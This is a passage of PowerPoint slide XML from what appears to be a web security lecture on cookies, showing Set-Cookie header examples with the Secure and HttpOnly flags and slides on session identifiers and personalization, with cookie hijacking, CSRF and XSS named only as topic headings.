              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627063" y="4065588"/>
            <a:ext cx="8955087" cy="192087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEEEE"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1521"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE220C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Secure;</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs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34FFB48-B608-3D49-9A7C-43855FD899F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="312737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42337B09-2FB2-2B4F-8EE0-94CAE0C0B849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3067050"/>
            <a:ext cx="1971675" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED8E755-AD85-8F41-B922-A39DFF1760F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="369728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7692135A-C68A-1149-B893-97025A44689C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="426720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9463" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A6057A-2CB1-6944-8009-E2F6D2ADB908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3486150"/>
            <a:ext cx="2638425" cy="106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6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie hijacking  CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54849CD-67B9-6E49-A051-711B182A67E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="5672138"/>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A5157045-6239-6D42-B516-A3F970CACD9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5619750"/>
            <a:ext cx="3641725" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19466" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DD6962-82DE-B444-A7FB-2EB8795073CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>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E65BF97-7AA9-BE44-B0E1-1DB01C6B26B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717800" y="1244600"/>
            <a:ext cx="4624388" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-555" dirty="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-233" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-568" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E645B669-ECE5-AB49-B644-D259CFE81D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="3067050"/>
            <a:ext cx="8413750" cy="746125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6672" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>setting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-8" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>being </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="88" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="63" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3E6EE8-05C4-1743-91E9-94D12FFF0133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701675" y="4660900"/>
            <a:ext cx="8656638" cy="196850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEEEE"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1546"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="3" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Secure;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="55" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE220C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs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7127908-AFE2-DA4D-8EB5-81A4F02B2C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1093451" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-90" dirty="0"/>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>cookies?</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6EDE6B-B9CE-E548-A859-DCF7B24C55F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2365375"/>
            <a:ext cx="141287" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5EFA05-554E-9841-8C67-E97803E6B869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2286000"/>
            <a:ext cx="3532188" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="2750" b="1" spc="15">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Session identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB8FE2E-9DF7-354D-9B6D-1CA966601BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="2921000"/>
            <a:ext cx="136525" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="204" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58374" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D506E57-2901-C444-AD0C-79D745BEF26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1333500" y="2708275"/>
            <a:ext cx="85725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53000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After a user has authenticated, subsequent actions provide a cookie.  So the user does not have to authenticate each time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F530B9B-6334-7B49-85B2-AD61C5E44E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4816475"/>
            <a:ext cx="119062" cy="319088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4D7C5AC-9529-CC4A-A5FC-0CB271836D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="4756150"/>
            <a:ext cx="2638425" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Person</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>alizati</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58377" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2832565A-E794-914C-AD62-F33BEBAD3725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="909638" y="5200650"/>
            <a:ext cx="75438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556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53000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let an anonymous user customize your site  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Store language choice, etc., in the cookie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0AF1549-0B1D-DF48-86E4-303C405BB2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1093451" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-90" dirty="0"/>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
